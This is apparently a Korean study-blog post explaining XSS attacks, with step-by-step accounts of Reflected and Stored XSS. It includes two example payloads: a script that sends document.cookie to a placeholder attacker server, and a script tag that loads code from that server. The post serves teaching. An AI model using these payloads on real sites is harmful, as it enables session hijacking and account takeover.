XSS
클라이언트 측의 웹 브라우저를 공격하는 기법
주로 자바스크립트를 이용해 <script>공격스크립트</script>와 같이 구현한다.
예를 들어,
<script>document.location="공격자서버/cookie?"+document.cookie</script> 를 통해 쿠키를 가져올 수도 있고,
또는
<script src="공격자서버"></script> 과 같은 형식으로 공걱자 서버에 심어둔 악성 코드를 실행하게 할 수도 있다.
XSS 공격 유형
Reflected XSS / Stored XSS
* Reflected XSS 공격
1. 공격자가 사회공학적 기법을 이용해 사용자에게 피싱 링크를 보낸다.
2. 사용자가 피싱 링크를 클릭하면, 링크에 있는 스크립트 코드가 삽입된 요청을 서버에 보낸다.
3. 서버가 사용자의 요청, 즉 스크립트 코드를 반사시켜 사용자의 브라우저에서 실행되게 한다.
4. 스크립트가 실행되면서 사용자의 세션쿠키를 공격자의 서버로 가져오게 된다.
5. 공격자는 이 세션쿠키를 이용하여 사용자의 권한으로 접속할 수 있게 된다.
* Stored XSS 공격
1. 공격자가 스크립트를 삽입할 수 있는 곳(예를들어 방명록)에 스크립트를 삽입한다.
2. 사용자가 방명록에 접속한다.
3. 방명록에 저장되어 있던 스크립트 코드가 사용자의 브라우저에서 실행된다.
4. 사용자의 세션 쿠키를 공격자에게 보내는 스크립트이면,
5. 공격자는 4에서 받은 사용자의 세션쿠키로 사용자 권한으로 접속할 수 있게 된다.
'Web hacking > 기법' 카테고리의 다른 글
XSS_(3) Stored XSS 실습 (0) | 2023.05.14 |
---|---|
XSS_(2) Reflected XSS 실습 (0) | 2023.05.12 |
SQL injection_(4) Blind SQLi / medium, high 단계 및 대응 (0) | 2023.04.18 |
SQL injection_(3) column 개수 알아내기, UNION 공격 (0) | 2023.04.18 |
SQL injection_(2) WHERE문 우회 (0) | 2023.04.18 |